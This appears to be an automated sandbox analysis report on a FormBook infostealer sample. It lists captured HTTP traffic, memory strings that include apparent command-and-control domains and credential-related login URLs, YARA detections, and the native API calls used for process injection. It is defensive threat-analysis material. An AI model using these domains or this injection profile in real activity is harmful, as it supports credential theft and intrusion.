6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:33:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJGKmTvi9mSERkfB9QqwNfvbi062k1%2Biv%2FNV5ZTApW45axzlJyXsf9r2sFZ5veY3Lc84BO8Ew3PnP0YtV%2BZt3j8olQfD224uOVqH%2Bkagdv77RiXiirkqD%2BCrzq4PixsPvCN3Oz9KiM2U"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff710ae8f68c0f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1943&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 44 50 Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDP
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 20:33:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LuMsGH8l6vFK5Eq5yYcRGuy9vgterHnfXiwBRh37xCprA3PUpkvOdmnnNd2yCwTdSSk8qzU1euq0fyuFabVRhKIYp%2BeMJJuLeJlcYGk1pJWhNBclo5JITK02%2BxtsalpHgfypGE9CNneF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff711afe767d0e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1980&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: gsolWhsjddFW.exe, 00000009.00000002.4087823404.0000000005337000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aziziyeescortg.xyz
                Source: gsolWhsjddFW.exe, 00000009.00000002.4087823404.0000000005337000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aziziyeescortg.xyz/2pcx/
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
                Source: gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003452000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.0000000003452000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ieUnatt.exe, 00000008.00000003.2746207044.00000000084FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003452000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.0000000003452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033_s
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033ku
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ieUnatt.exe, 00000008.00000003.2747721040.0000000003433000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000342B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilyijy.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilylso.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4087201731.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilyywe.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ieUnatt.exe, 00000008.00000003.2756546513.0000000008518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003578000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kkpmoneysocial.top
                Source: ieUnatt.exe, 00000008.00000002.4087201731.0000000005CD6000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.00000000033E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN
                Source: ieUnatt.exe, 00000008.00000002.4087201731.00000000067D4000.00000004.10000000.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4085575768.0000000003EE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.networksolutions.com/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.NFhRxwbegd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.NFhRxwbegd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2562570319.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4085165315.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0042CCB3 NtClose,5_2_0042CCB3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912B60 NtClose,LdrInitializeThunk,5_2_01912B60
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01912DF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01912C70
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019135C0 NtCreateMutant,LdrInitializeThunk,5_2_019135C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01914340 NtSetContextThread,5_2_01914340
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01914650 NtSuspendThread,5_2_01914650
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912B80 NtQueryInformationFile,5_2_01912B80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912BA0 NtEnumerateValueKey,5_2_01912BA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912BF0 NtAllocateVirtualMemory,5_2_01912BF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912BE0 NtQueryValueKey,5_2_01912BE0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912AB0 NtWaitForSingleObject,5_2_01912AB0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912AD0 NtReadFile,5_2_01912AD0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912AF0 NtWriteFile,5_2_01912AF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912DB0 NtEnumerateKey,5_2_01912DB0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912DD0 NtDelayExecution,5_2_01912DD0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912D10 NtMapViewOfSection,5_2_01912D10
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912D00 NtSetInformationFile,5_2_01912D00
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912D30 NtUnmapViewOfSection,5_2_01912D30
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912CA0 NtQueryInformationToken,5_2_01912CA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912CC0 NtQueryVirtualMemory,5_2_01912CC0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912CF0 NtOpenProcess,5_2_01912CF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912C00 NtQueryInformationProcess,5_2_01912C00
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912C60 NtCreateKey,5_2_01912C60
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912F90 NtProtectVirtualMemory,5_2_01912F90
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912FB0 NtResumeThread,5_2_01912FB0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912FA0 NtQuerySection,5_2_01912FA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912FE0 NtCreateFile,5_2_01912FE0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912F30 NtCreateSection,5_2_01912F30
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912F60 NtCreateProcessEx,5_2_01912F60
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912E80 NtReadVirtualMemory,5_2_01912E80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912EA0 NtAdjustPrivilegesToken,5_2_01912EA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912EE0 NtQueueApcThread,5_2_01912EE0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01912E30 NtWriteVirtualMemory,5_2_01912E30
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01913090 NtSetValueKey,5_2_01913090
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01913010 NtOpenDirectoryObject,5_2_01913010
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019139B0 NtGetContextThread,5_2_019139B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01913D10 NtOpenProcessToken,5_2_01913D10
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01913D70 NtOpenThread,5_2_01913D70
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B4650 NtSuspendThread,LdrInitializeThunk,8_2_050B4650
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B4340 NtSetContextThread,LdrInitializeThunk,8_2_050B4340
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_050B2D10
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_050B2D30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2DD0 NtDelayExecution,LdrInitializeThunk,8_2_050B2DD0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_050B2DF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2C60 NtCreateKey,LdrInitializeThunk,8_2_050B2C60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_050B2C70
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_050B2CA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2F30 NtCreateSection,LdrInitializeThunk,8_2_050B2F30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2FB0 NtResumeThread,LdrInitializeThunk,8_2_050B2FB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2FE0 NtCreateFile,LdrInitializeThunk,8_2_050B2FE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_050B2E80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_050B2EE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2B60 NtClose,LdrInitializeThunk,8_2_050B2B60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_050B2BA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_050B2BE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_050B2BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2AD0 NtReadFile,LdrInitializeThunk,8_2_050B2AD0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2AF0 NtWriteFile,LdrInitializeThunk,8_2_050B2AF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B35C0 NtCreateMutant,LdrInitializeThunk,8_2_050B35C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B39B0 NtGetContextThread,LdrInitializeThunk,8_2_050B39B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2D00 NtSetInformationFile,8_2_050B2D00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2DB0 NtEnumerateKey,8_2_050B2DB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2C00 NtQueryInformationProcess,8_2_050B2C00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2CC0 NtQueryVirtualMemory,8_2_050B2CC0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2CF0 NtOpenProcess,8_2_050B2CF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2F60 NtCreateProcessEx,8_2_050B2F60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2F90 NtProtectVirtualMemory,8_2_050B2F90
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2FA0 NtQuerySection,8_2_050B2FA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2E30 NtWriteVirtualMemory,8_2_050B2E30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2EA0 NtAdjustPrivilegesToken,8_2_050B2EA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2B80 NtQueryInformationFile,8_2_050B2B80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B2AB0 NtWaitForSingleObject,8_2_050B2AB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B3010 NtOpenDirectoryObject,8_2_050B3010
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B3090 NtSetValueKey,8_2_050B3090
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B3D10 NtOpenProcessToken,8_2_050B3D10
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B3D70 NtOpenThread,8_2_050B3D70
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F89A60 NtDeleteFile,8_2_02F89A60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F89B00 NtClose,8_2_02F89B00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F89810 NtCreateFile,8_2_02F89810
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F89970 NtReadFile,8_2_02F89970
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F89C50 NtAllocateVirtualMemory,8_2_02F89C50
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_00DFD4040_2_00DFD404
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DD76B80_2_06DD76B8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DD14A90_2_06DD14A9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DD35700_2_06DD3570
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DD31380_2_06DD3138
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DD31280_2_06DD3128
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DD2CF10_2_06DD2CF1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DD2D000_2_06DD2D00
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DD18F80_2_06DD18F8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE96C80_2_06DE96C8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE1E7A0_2_06DE1E7A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE2CF80_2_06DE2CF8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE0B900_2_06DE0B90
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE80A00_2_06DE80A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE86980_2_06DE8698
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE86880_2_06DE8688
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE96B80_2_06DE96B8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE8E400_2_06DE8E40
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE9FC80_2_06DE9FC8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE9FBA0_2_06DE9FBA
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE4F100_2_06DE4F10
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE4F000_2_06DE4F00
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE2CAF0_2_06DE2CAF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE14400_2_06DE1440
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE55880_2_06DE5588
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE55780_2_06DE5578
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DEA5700_2_06DEA570
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DEA5600_2_06DEA560
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE8A900_2_06DE8A90
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE8A800_2_06DE8A80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE3BD80_2_06DE3BD8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE3BC80_2_06DE3BC8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE2BE00_2_06DE2BE0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE53980_2_06DE5398
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE53A80_2_06DE53A8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE83580_2_06DE8358
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE83480_2_06DE8348
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE0B770_2_06DE0B77
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE0B3D0_2_06DE0B3D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE18D90_2_06DE18D9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE80900_2_06DE8090
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE00400_2_06DE0040
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE00070_2_06DE0007
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE51180_2_06DE5118
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 0_2_06DE51080_2_06DE5108
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_00418BF35_2_00418BF3
